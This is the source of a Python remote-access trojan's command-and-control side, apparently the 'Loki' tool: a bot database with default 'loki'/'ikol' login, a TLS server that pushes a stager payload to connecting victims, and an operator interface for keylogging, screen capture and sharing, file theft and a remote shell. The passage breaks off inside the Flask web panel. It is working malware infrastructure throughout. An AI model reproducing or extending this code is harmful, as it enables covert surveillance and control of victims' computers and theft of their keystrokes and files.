# attempts before locking # cert if not os.path.exists("cert"): os.makedirs("cert") CERT_FILE = "cert/public.crt" KEY_FILE = "cert/private.key" # communication codes STAGER_CODE = 0 CONN_CODE = 1 # stager PAYLOAD_PATH = "agent/.bin/.payload.exe" BLOCK_SIZE = 65535 # Settings MIN_USERNAME_LENGTH = 4 MAX_USERNAME_LENGTH = 16 MIN_PASSWORD_LENGTH = 12 MAX_PASSWORD_LENGTH = 256 # Default creds DEFAULT_USERNAME = "loki" DEFAULT_PASSWORD = "ikol" # Downloads path DOWNLOADS_PATH = "downloads" SCREENSHOTS_PATH = os.path.join(DOWNLOADS_PATH, "screenshots") FILES_PATH = os.path.join(DOWNLOADS_PATH, "files") if not os.path.exists(SCREENSHOTS_PATH): os.makedirs(SCREENSHOTS_PATH) if not os.path.exists(FILES_PATH): os.makedirs(FILES_PATH) ================================================ FILE: lib/database.py ================================================ # Date: 07/02/2018 # Author: Pure-L0G1C # Description: DBMS import bcrypt import sqlite3 from . import const from time import time from os import urandom from hashlib import sha256 from base64 import b64encode from datetime import datetime class Database(object): def __init__(self): self.db_path = const.DATABASE self.create_tables() self.create_default_account() def create_tables(self): self.db_create(''' CREATE TABLE IF NOT EXISTS Account( user_id TEXT PRIMARY KEY, username TEXT, password TEXT ); ''') self.db_create(''' CREATE TABLE IF NOT EXISTS Status( last_online INTEGER, date_created INTEGER, stat_id TEXT NOT NULL, FOREIGN KEY(stat_id) REFERENCES Account(user_id) ); ''') self.db_create(''' CREATE TABLE IF NOT EXISTS Attempt( last_attempt INTEGER, attempts_made INTEGER, ampt_id TEXT NOT NULL, FOREIGN KEY(ampt_id) REFERENCES Account(user_id) ); ''') self.db_create(''' CREATE TABLE IF NOT EXISTS Lock( time_locked INTEGER DEFAULT 0, lock_id TEXT NOT NULL, FOREIGN KEY(lock_id) REFERENCES Account(user_id) ); ''') def add_account(self, username, password): username = username.lower() user_id = self.gen_user_id(username, password) hashed_password = self.hash_password(password) self.db_update(''' INSERT INTO Account(user_id, username, password) VALUES(?, ?, ?); ''', [user_id, username, hashed_password]) self.db_update(''' INSERT INTO Status(last_online, date_created, stat_id) VALUES(?, ?, ?); ''', [time(), time(), user_id]) self.db_update(''' INSERT INTO Attempt(last_attempt, attempts_made, ampt_id) VALUES(?, ?, ?); ''', [time(), 0, user_id]) self.db_update(''' INSERT INTO Lock(lock_id) VALUES(?); ''', [user_id]) def account_exists(self, username): data = self.db_query( 'SELECT * FROM Account WHERE username=?;', [username.lower()], False) return True if len(data) else False def compare_passwords(self, user_id, password): hashed_password = self.db_query( 'SELECT password FROM Account WHERE user_id=?;', [user_id]) return True if bcrypt.hashpw(password.encode('utf-8'), hashed_password) == hashed_password else False def check_password(self, username, password): hashed_password = self.db_query( 'SELECT password FROM Account WHERE username=?;', [username]) return True if bcrypt.hashpw(password.encode('utf-8'), hashed_password) == hashed_password else False def authenticate(self, username, password): username = username.lower() if self.account_exists(username): user_id = self.get_user_id(username) if not self.is_locked(user_id): if self.check_password(username, password): return self.get_user_id(username) else: self.failed_attempt(user_id) return None def is_empty(self): data = self.db_query('SELECT * FROM Account;', [], False) return False if len(data) else True def create_default_account(self): if self.is_empty(): self.add_account('loki', 'ikol') # -------- Attempts -------- # def lock_account(self, user_id): self.db_update('UPDATE Lock SET time_locked=? WHERE lock_id=?;', [ time(), user_id]) def failed_attempt(self, user_id): current_value = self.failed_attempts_counts(user_id) if current_value >= const.MAX_FAILED_ATTEMPTS-1: if not self.is_locked(user_id): self.lock_account(user_id) else: self.db_update('UPDATE Attempt SET attempts_made=? WHERE ampt_id=?;', [ current_value + 1, user_id]) def failed_attempts_counts(self, user_id): return self.db_query('SELECT attempts_made FROM Attempt WHERE ampt_id=?;', [user_id]) def is_locked(self, user_id): time_locked = self.locked(user_id) if time_locked: if (time() - time_locked) >= const.LOCK_TIME: self.remove_locked_account(user_id) return False else: return True else: return False def locked(self, user_id): return self.db_query(''' SELECT time_locked FROM Lock INNER JOIN Account ON account.user_id = Lock.lock_id WHERE Lock.lock_id=?; ''', [user_id]) def remove_locked_account(self, user_id): self.db_update( 'UPDATE Attempt SET attempts_made=? WHERE ampt_id=?;', [0, user_id]) # -------- Database Wrappers -------- # def db_query(self, cmd, args, fetchone=True): database = sqlite3.connect(self.db_path) sql = database.cursor().execute(cmd, args) data = sql.fetchone()[0] if fetchone else sql.fetchall() database.close() return data def db_update(self, cmd, args): database = sqlite3.connect(self.db_path) database.cursor().execute(cmd, args) database.commit() database.close() def db_create(self, cmd): database = sqlite3.connect(self.db_path) database.cursor().execute(cmd) database.commit() database.close() # -------- Update -------- # def update_password(self, user_id, password): hashed_password = self.hash_password(password) self.db_update('UPDATE Account SET password=? WHERE user_id=?;', [ hashed_password, user_id]) def update_username(self, user_id, username): self.db_update('UPDATE Account SET username=? WHERE user_id=?;', [ username.lower(), user_id]) # -------- Misc -------- # def hash_password(self, password): return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt()) def gen_user_id(self, username, password): _username = username.encode('utf-8') + urandom(64 * 1024) _password = password.encode('utf-8') + urandom(64 * 1024) _username_password = b64encode( _username + _password + urandom(64 * 64)) secure_hash = sha256(_username_password).digest().hex() return secure_hash def get_date_created(self, user_id): return self.db_query('SELECT date_created FROM Status WHERE stat_id=?;', [user_id]) def get_user_id(self, username): return self.db_query('SELECT user_id FROM Account WHERE username=?;', [username]) def get_last_active(self, user_id): epoch_time = self.db_query( 'SELECT last_online FROM Status WHERE stat_id=?;', [user_id]) self.db_update('UPDATE Status SET last_online=? WHERE stat_id=?;', [ time(), user_id]) return datetime.fromtimestamp(epoch_time).strftime('%b %d, %Y at %I:%M %p') def get_account_status(self, user_id, username): default_username = const.DEFAULT_USERNAME default_password = const.DEFAULT_PASSWORD username = username.lower() is_same_password = self.compare_passwords(user_id, default_password) if username == default_username.lower() and is_same_password: status = 'It is imperative that you update your username and password' elif username == default_username: status = 'Please consider changing your username' elif is_same_password: status = 'Please consider changing your passsword' else: status = None return status ================================================ FILE: lib/server/__init__.py ================================================ # Date: 07/20/2018 # Author: Pure-L0G1C ================================================ FILE: lib/server/lib/__init__.py ================================================ # Date: 07/20/2018 # Author: Pure-L0G1C ================================================ FILE: lib/server/lib/file.py ================================================ # Date: 08/31/2018 # Author: Pure-L0G1C # Description: File manager class File(object): chunk_size = (64 << 10) - 1 @classmethod def read(cls, file): with open(file, 'rb') as f: while True: data = f.read(cls.chunk_size) if data: yield data else: break @classmethod def write(cls, file, data): with open(file, 'wb') as f: for n in range(0, len(data), cls.chunk_size): _max = n + cls.chunk_size _data = data[n:_max] f.write(_data.encode() if isinstance(_data, str) else _data) ================================================ FILE: lib/server/lib/interface.py ================================================ # Date: 06/07/2018 # Author: Pure-L0G1C # Description: Interface for the master from re import match from lib import const from hashlib import sha256 from time import time, sleep from os import urandom, path from threading import Thread from datetime import datetime from os import getcwd, path, remove from . import ssh, sftp, sscreenshare ######## Screenshare ######## class ScreenShare: screen_src = path.join(getcwd(), 'templates', 'screen.html') def __init__(self, bot, update): self.sscreenshare = sscreenshare.SScreenShare( const.PRIVATE_IP, const.FTP_PORT ) self.bot_id = bot['bot_id'] self.shell = bot['shell'] self.update = update @property def is_alive(self): return self.sscreenshare.is_alive def start(self, code): print('Starting screenshare ...') self.shell.send(code=code, args=self.update) Thread(target=self.sscreenshare.start, daemon=True).start() def stop(self): print('Stopping screenshare ...') self.shell.send(code=16) self.sscreenshare.stop() if path.exists(ScreenShare.screen_src): try: remove(ScreenShare.screen_src) except: pass def close(self): self.stop() ######## FTP ######## class FTP(object): def __init__(self, file, bot, download=True): self.sftp = sftp.sFTP( const.PRIVATE_IP, const.FTP_PORT, max_time=60, verbose=True) self.bot_id = bot['bot_id'] self.shell = bot['shell'] self.download = download self.is_alive = False self.success = False self.time = None self.file = file def send(self, code, file=None): if not path.exists(file): return self.shell.send(code=code, args=file) self.is_alive = True self.sftp.send(file) self.is_alive = False self.time = self.sftp.time_elapsed self.success = True if self.sftp.error_code != -1 else False def recv(self, code, file=None): self.shell.send(code=code, args=file) self.is_alive = True self.sftp.recv(code=code) self.is_alive = False self.time = self.sftp.time_elapsed self.success = True if self.sftp.error_code != -1 else False def close(self): self.sftp.close() self.is_alive = False ######## Interface ######## class Interface(object): def __init__(self): self.bots = {} self.ssh = None self.ftp = None self.screenshare = None self.sig = self.signature def close(self): if self.ftp: self.ftp.close() self.ftp = None if self.ssh: self.ssh.close() self.ssh = None if self.screenshare: self.screenshare.close() self.screenshare = None self.disconnect_all() def gen_bot_id(self, uuid): bot_ids = [self.bots[bot]['bot_id'] for bot in self.bots] while 1: bot_id = sha256((sha256(urandom(64 * 32) + urandom(64 * 64) ).digest().hex() + uuid).encode()).digest().hex() if not bot_id in bot_ids: break return bot_id @property def signature(self): bots = b'' for bot in self.bots: bot_id = self.bots[bot]['bot_id'] bot_id = bot_id[:8] + bot_id[-8:] bots += bot_id.encode() return sha256(bots).digest().hex() def is_connected(self, uuid): for bot in self.bots: if self.bots[bot]['uuid'] == uuid: return True return False def connect_client(self, sess_obj, conn_info, shell): uuid = conn_info['args']['sys_info']['uuid'] if self.is_connected(uuid): self.close_sess(sess_obj, shell) else: bot_id = self.gen_bot_id(uuid) self.bots[sess_obj] = {'bot_id': bot_id, 'uuid': uuid, 'intel': conn_info['args'], 'shell': shell, 'session': sess_obj} self.sig = self.signature def close_sess(self, sess_obj, shell_obj): print('Closing session ...') shell_obj.is_alive = False shell_obj.send(code=7, args=None) # 7 - disconnect sess_obj.close() if sess_obj in self.bots: del self.bots[sess_obj] self.sig = self.signature def disconnect_client(self, sess_obj): print('Disconnecting client ...') if sess_obj in self.bots: self.bots[sess_obj]['shell'].is_alive = False bot_id = self.bots[sess_obj]['bot_id'] if self.ftp: if self.ftp.bot_id == bot_id: self.ftp.close() self.ftp = None self.close_sess(sess_obj, self.bots[sess_obj]['shell']) self.sig = self.signature def disconnect_all(self): for bot in [self.bots[bot] for bot in self.bots]: bot['session'].close() self.sig = self.signature def get_bot(self, bot_id): for bot in self.bots: if self.bots[bot]['bot_id'] == bot_id: return self.bots[bot] def ssh_obj(self, bot_id): bot = self.get_bot(bot_id) if bot: if self.ssh: self.ssh.close() self.ssh = ssh.SSH(const.PRIVATE_IP, const.SSH_PORT, max_time=30, verbose=True) sock_obj = self.ssh.start() if sock_obj: t = Thread(target=self.ssh.serve, args=[sock_obj]) t.daemon = True t.start() bot['session'].send(code=1) return self.ssh else: self.ssh.close() self.ssh = None def ssh_exe(self, cmd): return self.ssh.send(cmd) def ftp_obj(self, bot_id, cmd_id, file, override): bot = self.get_bot(bot_id) if not bot: return '' if cmd_id == 3: if not path.exists(file): return 'Upload process failed; the file {} was not found'.format(file) if self.ftp: if all([self.ftp.is_alive, not override]): return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading', self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8]) self.ftp.close() del self.ftp if self.screenshare: if self.screenshare.is_alive and not override: return 'Viewing the screen of {}. Use --override option to override this process'.format( self.screenshare.bot_id[:8] ) self.screenshare.close() del self.screenshare self.screenshare = None self.ftp = FTP(file, bot, download=False if cmd_id == 3 else True) ftp_func = self.ftp.send if cmd_id == 3 else self.ftp.recv Thread(target=ftp_func, args=[cmd_id, file], daemon=True).start() return '{} process started successfully'.format('Download' if self.ftp.download else 'Upload') def ftp_status(self): if not self.ftp: return 'No file transfer in progress' if self.ftp.is_alive: return '{} {} {} {}. Check back in 1 minute'.format('Downloading' if self.ftp.download else 'Uploading', self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8]) else: return 'Attempted to {} {} {} {}. The process {} a success. Time-elapsed: {}(sec)'.format('download' if self.ftp.download else 'upload', self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8], 'was' if self.ftp.success else 'was not', self.ftp.time) def write_screen_scr(self, update): html = ''' Screenshare
'''.format(update * 1000) with open(ScreenShare.screen_src, 'wt') as f: f.write(html) def screenshare_obj(self, bot_id, cmd_id, update, override): bot = self.get_bot(bot_id) if not bot: return '' if self.ftp: if self.ftp.is_alive and not override: return 'Already {} {} {} {}. Use --override option to override this process'.format('Downloading' if self.ftp.download else 'Uploading', self.ftp.file, 'from' if self.ftp.download else 'to', self.ftp.bot_id[:8]) self.ftp.close() del self.ftp self.ftp = None if self.screenshare: if self.screenshare.is_alive and not override: return 'Already viewing the screen of {}. Use --override option to override this process'.format( self.screenshare.bot_id[:8] ) self.screenshare.close() self.screenshare.update = update self.screenshare.shell = bot['shell'] self.screenshare.bot_id = bot['bot_id'] else: self.screenshare = ScreenShare(bot, update) self.screenshare.start(cmd_id) self.write_screen_scr(update) return 'Screenshare is being hosted at the URL: {}'.format(ScreenShare.screen_src) def execute_cmd_by_id(self, bot_id, cmd_id, args): override = True if '--override' in args else False if not cmd_id.isdigit(): return 'Failed to send command' cmd_id = int(cmd_id) if override: args.pop(args.index('--override')) if cmd_id == 1: return self.ftp_status() if cmd_id == 15: if '-1' in args: args.remove('-1') if not len(args): return 'Please provide an update time in seconds' update = ''.join(args[0]).strip() if not update: return 'Please provide an update time in seconds' try: update = float(update) except ValueError: return 'Please provide an integer for update time' return self.screenshare_obj(bot_id, cmd_id, update, override) if cmd_id == 16: if not self.screenshare: return 'Screenshare is inactive' if not self.screenshare.is_alive: return 'Screenshare is inactive' self.screenshare.stop() return 'Stopped screenshare ...' if cmd_id == 17: if not self.screenshare: return 'Screenshare is inactive' if not self.screenshare.is_alive: return 'Screenshare is inactive' return 'Viewing the screen of {}\nUpdating every {} seconds\nURL: {}'.format( self.screenshare.bot_id[:8], self.screenshare.update, ScreenShare.screen_src ) elif any([cmd_id == 3, cmd_id == 4, cmd_id == 5]): return self.ftp_obj(bot_id, cmd_id, ' '.join(args[0:]) if cmd_id != 5 else 'a screenshot', override) else: bot = self.get_bot(bot_id) if bot: bot['shell'].send(code=cmd_id, args=args) if cmd_id == 12: if not bot['shell'].keylogging: bot['shell'].keylogging = True else: return 'Keylogger is already active' if cmd_id == 13: if bot['shell'].keylogging: bot['shell'].keylogging = False else: return 'Keylogger is already inactive' if all([cmd_id == 14, not bot['shell'].keylogging]): return 'Keylogger is inactive' return self.keystrokes(bot['shell']) if cmd_id == 14 else 'Command sent successfully' return 'Failed to send command' def keystrokes(self, bot_shell): while all([bot_shell.is_alive, not bot_shell.keystrokes]): pass try: if all([bot_shell.is_alive, bot_shell.keystrokes]): keystrokes = bot_shell.keystrokes bot_shell.keystrokes = None return keystrokes if keystrokes != '-1' else '' except: pass def valid_thread(self, thread): return True if thread.isdigit() else False def valid_ip(self, ip): return False if not match(r'^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$', ip) else True def valid_port(self, port): _port = str(port).strip() if not len(_port): return False else: # check if number for item in _port: if not item.isdigit(): return False # check if number starts with a zero if int(_port[0]) == 0: return False # check if number is larger than 65535 if int(_port) > 65535: return False return True ================================================ FILE: lib/server/lib/session.py ================================================ # Date: 06/02/2018 # Author: Pure-L0G1C # Description: Session import time import json import socket class Session(object): def __init__(self, session, ip): self.ip = ip[0] try: self.session = session except: pass def initial_communication(self): try: data = self.recv() return data except: pass def close(self): try: self.session.close() self.session.shutdown(socket.SHUT_RDWR) except: pass def struct(self, code=None, args=None): return json.dumps({'code': code, 'args': args}).encode() def send(self, code=None, args=None): data = self.struct(code, args) try: self.session.sendall(data) except: pass def recv(self, size=4096): try: return json.loads(self.session.recv(size)) except: pass ================================================ FILE: lib/server/lib/sftp.py ================================================ # Date: 07/27/2018 # Author: Pure-L0G1C # Description: Secure FTP import os import ssl import socket from . file import File from time import time, sleep from datetime import datetime from socket import timeout as TimeOutError from lib.const import CERT_FILE, KEY_FILE, SCREENSHOTS_PATH, FILES_PATH class sFTP(object): def __init__(self, ip, port, max_time=15, verbose=False): self.ip = ip self.port = port self.error_code = 0 self.time_elapsed = 0 self.verbose = verbose self.max_time = max_time self.chunk_size = 0xffff self.server_socket = None self.session_size = 0x1000 self.recipient_session = None def display(self, msg): if self.verbose: print('{}\n'.format(msg)) def test_tunnel(self): value = self.recipient_session.recv(self.session_size) self.recipient_session.sendall(value) def send_file(self, file): # send file's name sleep(0.5) print('Sending file\'s name ...') self.recipient_session.sendall(os.path.basename(file).encode('utf8')) # send file's data sleep(0.5) self.display('Sending {} ...'.format(file)) for data in File.read(file): self.recipient_session.sendall(data) self.display('File sent') def recv_file(self): self.test_tunnel() _bytes = b'' # receive file's name file_name = self.recipient_session.recv(self.session_size) # receive file's data self.display('Downloading {} ...'.format(file_name)) while True: data = self.recipient_session.recv(self.chunk_size << 2) if data: _bytes += data else: break print('Downloaded file') return file_name, _bytes def send(self, file): if not os.path.exists(file): self.display('File `{}` does not exist'.format(file)) self.error_code = -1 return self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server_socket.settimeout(self.max_time) try: self.server_socket.bind((self.ip, self.port)) self.server_socket.listen(1) except OSError: self.display('Failed to start FTP server on {}:{}'.format( self.ip, self.port)) self.error_code = -1 try: session, addr = self.server_socket.accept() self.recipient_session = ssl.wrap_socket( session, server_side=True, certfile=CERT_FILE, keyfile=KEY_FILE) except TimeOutError: self.display('Server timed out') self.error_code = -1 try: started = time() self.send_file(file) self.time_elapsed = (time() - started) self.display('Time-elapsed: {}(sec)'.format(time() - started)) except: self.error_code = -1 finally: self.close() def recv(self, code): self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server_socket.settimeout(self.max_time) try: self.server_socket.bind((self.ip, self.port)) self.server_socket.listen(1) except OSError: self.display('Failed to start FTP server on {}:{}'.format( self.ip, self.port)) self.error_code = -1 try: session, addr = self.server_socket.accept() self.recipient_session = ssl.wrap_socket( session, server_side=True, certfile=CERT_FILE, keyfile=KEY_FILE) except TimeOutError: self.display('Server timed out') self.error_code = -1 try: started = time() file_name, data = self.recv_file() file_name = file_name.decode() if code == 5: # Screenshot file_name, exten = os.path.splitext( os.path.basename(file_name)) file_name = '{}_{}{}'.format( file_name, datetime.now().strftime('%Y-%m-%d_%H.%M.%S'), exten) file_name = os.path.join(SCREENSHOTS_PATH, file_name) else: file_name = os.path.join(FILES_PATH, file_name) print(f'\nFilename: {file_name}\n') File.write(file_name, data) self.time_elapsed = (time() - started) self.display('Time-elapsed: {}(sec)'.format(time() - started)) except Exception as e: print(f'\nException: {e}\n') self.error_code = -1 finally: self.close() def socket_closed(self): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.settimeout(1.5) s = ssl.wrap_socket( sock, ssl_version=ssl.PROTOCOL_SSLv23 ) try: return s.connect((self.ip, self.port)) == 0 except (ConnectionRefusedError, socket.timeout): return True except: return False def close(self): print('\nClosing sFTP ...') while not self.socket_closed(): try: self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: try: self.server_socket.close() self.server_socket.shutdown(socket.SHUT_RDWR) except: pass finally: sleep(0.1) try: del self.recipient_session self.recipient_session = None except: try: del self.server_socket self.server_socket = None except: pass ================================================ FILE: lib/server/lib/shell.py ================================================ # Date: 06/05/2018 # Author: Pure-L0G1C # Description: Recv/Send to master import sys import time from queue import Queue from threading import Thread, RLock class Shell(object): def __init__(self, sess_obj, interface): self.interface = interface self.keylogging = False self.keystrokes = None self.sess = sess_obj self.is_alive = True self.recv = Queue() self.lock = RLock() def start(self): t1 = Thread(target=self.listen) t2 = Thread(target=self.recv_manager) t1.daemon = True t2.daemon = True t1.start() t2.start() t1.join() t2.join() def listen(self): while self.is_alive: recv = self.sess.recv() if recv: self.recv.put(recv) else: self.is_alive = False self.interface.disconnect_client(self.sess) def recv_manager(self): while self.is_alive: if self.recv.qsize(): with self.lock: recv = self.recv.get() if recv['code'] == -0: self.keystrokes = recv['args'] self.display_text('Data: {}'.format(recv['args'])) def send(self, code=None, args=None): self.sess.send(code=code, args=args) def display_text(self, text): print('{0}{1}{0}'.format('\n\n\t', text)) ================================================ FILE: lib/server/lib/sscreenshare.py ================================================ # Date: 10/03/2019 # Author: Mohamed # Description: Secure Screenshare import os import ssl import socket from time import sleep from . file import File from socket import timeout as TimeOutError from lib.const import CERT_FILE, KEY_FILE class SScreenShare: max_time = 30 image = 'static/img/screen.png' EOF = ''.encode() def __init__(self, ip, port): self.is_alive = True self.conn = None self.port = port self.ip = ip self.server_socket = None self.recipient_session = None self.error_msg = '' self.error_code = 0 def recv_image(self): _bytes = b'' while self.is_alive: data = self.recipient_session.recv(File.chunk_size) if not data or data == self.EOF: break else: _bytes += data return _bytes def write(self, data): if not self.is_alive: return with open(self.image, 'wb') as f: for n in range(0, len(data), File.chunk_size): _max = n + File.chunk_size _data = data[n:_max] f.write(_data.encode() if isinstance(_data, str) else _data) def display(self): while self.is_alive: try: data = self.recv_image() except Exception as e: self.error_msg = e self.stop() return if not data: self.error_msg = 'Empty data' self.stop() else: try: self.write(data) except: pass def start(self): image_path = os.path.dirname(self.image) if not os.path.exists(image_path): os.makedirs(image_path) self.is_alive = True self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 ) self.server_socket.settimeout(self.max_time) try: self.server_socket.bind((self.ip, self.port)) self.server_socket.listen(1) except OSError: self.error_msg = 'Failed to start Screenshare {}:{}'.format( self.ip, self.port ) self.error_code = -1 self.stop() try: session, addr = self.server_socket.accept() self.recipient_session = ssl.wrap_socket( session, server_side=True, certfile=CERT_FILE, keyfile=KEY_FILE ) self.display() except TimeOutError: self.error_msg = 'Screenshare timed out' self.error_code = -1 self.stop() def socket_closed(self): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.settimeout(1.5) s = ssl.wrap_socket( sock, ssl_version=ssl.PROTOCOL_SSLv23 ) try: return s.connect((self.ip, self.port)) == 0 except (ConnectionRefusedError, socket.timeout): return True except: return False def stop(self): if not self.is_alive: return self.is_alive = False if self.recipient_session: while not self.socket_closed(): try: self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: try: self.server_socket.close() self.server_socket.shutdown(socket.SHUT_RDWR) except: pass finally: sleep(0.1) finally: try: os.remove(self.image) except: pass try: del self.recipient_session self.recipient_session = None except: try: del self.server_socket self.server_socket = None except: pass ================================================ FILE: lib/server/lib/ssh.py ================================================ # Date: 07/27/2018 # Author: Pure-L0G1C # Description: Secure shell import os import ssl import socket from threading import Thread from lib.const import CERT_FILE, KEY_FILE from socket import timeout as TimeOutError class Communicate(object): def __init__(self, session): self.session_recv = 4096 << 12 self.session = session self.is_alive = True self.pending = False self.tmp_resp = '' self.resp = None def recv(self): self.session.settimeout(0.5) while self.is_alive: try: recv = self.session.recv(self.session_recv) if recv: data = recv.decode('utf8') if data != '-1': self.tmp_resp += data else: self.resp = self.tmp_resp self.pending = False else: self.stop() except: pass def send(self, data): if len(data.strip()): if not self.is_alive: return try: self.pending = True self.session.sendall(data.encode('utf8')) except: pass def start(self): recv = Thread(target=self.recv) recv.daemon = True recv.start() def stop(self): self.is_alive = False class Server(object): def __init__(self, communication): self.communication = communication self.communication.start() self.is_alive = True def stop(self): self.is_alive = False self.communication.is_alive = False def send(self, cmd): if len(cmd.strip()): if not self.communication.pending: self.communication.send(cmd) while all([self.is_alive, self.communication.is_alive, self.communication.pending]): pass self.communication.tmp_resp = '' resp = self.communication.resp self.communication.resp = None return resp class SSH(object): def __init__(self, ip, port, max_time=10, verbose=False): self.ip = ip self.port = port self.verbose = verbose self.max_time = max_time self.communication = None self.recipient_session = None def display(self, msg): if self.verbose: print('{}\n'.format(msg)) def start(self): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.settimeout(self.max_time) try: server_socket.bind((self.ip, self.port)) server_socket.listen(1) return server_socket except OSError: self.display('Failed to start ssh server on {}:{}'.format( self.ip, self.port)) def serve(self, server_socket): try: session, addr = server_socket.accept() self.recipient_session = ssl.wrap_socket( session, server_side=True, certfile=CERT_FILE, keyfile=KEY_FILE) except TimeOutError: self.display('Server timed out') self.close() return -1 communication = Communicate(self.recipient_session) if self.communication: self.close() self.communication = Server(communication) return 0 def close(self): try: print('\nClosing SSH ...') if self.communication: self.communication.stop() self.recipient_session.close() self.recipient_session.shutdown(socket.SHUT_RDWR) except: pass def send(self, cmd): if self.communication: return self.communication.send(cmd) ================================================ FILE: lib/server/server.py ================================================ # Date: 06/01/2018 # Author: Pure-L0G1C # Description: Server import ssl import socket from os import path from lib import const from time import sleep from queue import Queue from OpenSSL import crypto from random import SystemRandom from threading import Thread, RLock from .lib import session, shell, interface class Server(object): def __init__(self): self.interface = interface.Interface() self.waiting_conn = Queue() self.is_active = False # is the server active self.lock = RLock() self.server = None self.port = None self.ip = None self.is_processing = False def gen_cert(self): key_pair = crypto.PKey() key_pair.generate_key(crypto.TYPE_RSA, 2048) cert = crypto.X509() cert.get_subject().O = "Loki" cert.get_subject().CN = "Sami" cert.get_subject().OU = "Pure-L0G1C" cert.get_subject().C = "US" cert.get_subject().L = "Los Santos" cert.get_subject().ST = "California" cert.set_serial_number(SystemRandom().randint(2048**8, 4096**8)) cert.gmtime_adj_notBefore(0) cert.gmtime_adj_notAfter(256 * 409600) cert.set_issuer(cert.get_subject()) cert.set_pubkey(key_pair) cert.sign(key_pair, "sha256") with open(const.CERT_FILE, "wb") as f: f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) with open(const.KEY_FILE, "wb") as f: f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key_pair)) def server_start(self): if self.is_processing: return self.is_processing = True self.gen_cert() context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) context.load_cert_chain(const.CERT_FILE, const.KEY_FILE) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: sock.bind((self.ip, self.port)) self.is_active = True sock.settimeout(0.5) sock.listen(100) self.server = context.wrap_socket(sock, server_side=True) self.services_start() except OSError: self.display_text("Error: invalid IP") self.port = None self.ip = None finally: self.is_processing = False def server_stop(self): if self.is_processing: return self.is_processing = True if not self.is_active: self.is_processing = False return self.is_active = False self.interface.close() self.is_processing = False self.ip, self.port = None, None def manage_conn_info(self, sess_obj, conn_info): if conn_info: try: with self.lock: services = { "ssh": {"ip": const.PUBLIC_IP, "port": const.SSH_PORT}, "ftp": {"ip": const.PUBLIC_IP, "port": const.FTP_PORT}, } sess_obj.send(args=services) self.manage_conn(sess_obj, conn_info) except: pass def manage_conn(self, sess_obj, conn_info): _shell = shell.Shell(sess_obj, self.interface) shell_thread = Thread(target=_shell.start) self.interface.connect_client(sess_obj, conn_info, _shell) shell_thread.daemon = True shell_thread.start() def send_payload(self, sess): """Send payload to stager""" if not path.exists(const.PAYLOAD_PATH): print("Payload binary does not exist; please generate it") return with open(const.PAYLOAD_PATH, "rb") as f: while True: data = f.read(const.BLOCK_SIZE) if data: sess.sendall(data) else: break def examine_conn(self, s, conn_info): if type(conn_info) != dict: print("Client did not supply a proper data type") return if not "code" in conn_info or not "args" in conn_info: print("Client did not supply both code and args") return if conn_info["code"] == None: print("Client supplied no code") return if conn_info["code"] == const.STAGER_CODE: self.send_payload(s.session) return if conn_info["code"] == const.CONN_CODE: print("Establishing a secure connection ...") self.manage_conn_info(s, conn_info) def establish_conn(self, sess, ip): s = session.Session(sess, ip) conn_info = s.initial_communication() if conn_info: self.examine_conn(s, conn_info) def waiting_conn_manager(self): while self.is_active: if self.waiting_conn.qsize(): session, ip = self.waiting_conn.get() sleep(0.5) self.establish_conn(session, ip) def server_loop(self): while self.is_active: try: session, ip = self.server.accept() self.waiting_conn.put([session, ip]) except: pass def services_start(self): server_loop = Thread(target=self.server_loop) conn_manager = Thread(target=self.waiting_conn_manager) server_loop.daemon = True conn_manager.daemon = True server_loop.start() conn_manager.start() print("Server started successfully") # -------- UI -------- # def display_text(self, text): print("{0}{1}{0}".format("\n\n\t", text)) def start(self, ip, port): if self.is_active: self.server_stop() self.ip, self.port = ip, int(port) self.server_start() sleep(1.2) return self.is_active def stop(self): if self.is_active: self.server_stop() sleep(1.2) return self.is_active ================================================ FILE: linter.sh ================================================ # flake8 echo -e "[Begin flake8]\n" flake8 . echo -e "\n[End flake8]" # mypy echo -e "[Begin mypy]\n" mypy --ignore-missing-imports --install-types . echo -e "\n[End mypy]" # bandit echo -e "[Begin bandit]\n" bandit -r . echo -e "\n[End bandit]" ================================================ FILE: loki.py ================================================ # Date: 07/02/2018 # Author: Pure-L0G1C # Description: Web server import re from os import urandom from lib import database, const from flask_wtf import CSRFProtect from string import ascii_uppercase from lib.server.server import Server from flask import ( Flask, render_template, request, session, jsonify, redirect, url_for, escape, ) app = Flask(__name__) app.config["JSON_SORT_KEYS"] = False app.config["SECRET_KEY"] = urandom(0x200) # cookie encryption # Protection against CSRF attack csrf = CSRFProtect(app) csrf.init_app(app) # server server = Server() db = database.Database() def get_bot(bot_id): bots = server.interface.bots for bot_session in bots: if bots[bot_session]["bot_id"] == bot_id: return bots[bot_session] def login_required(func): def wrapper(*args, **kwargs): if not "logged_in" in session: return redirect(url_for("index")) elif not session["logged_in"]: return redirect(url_for("index")) else: return func(*args, **kwargs) wrapper.__name__ = func.__name__ return wrapper def bot_required(func): def wrapper(*args, **kwargs): if not "bot_id" in session: return jsonify({"resp": ""}) if not get_bot(session["bot_id"]): return 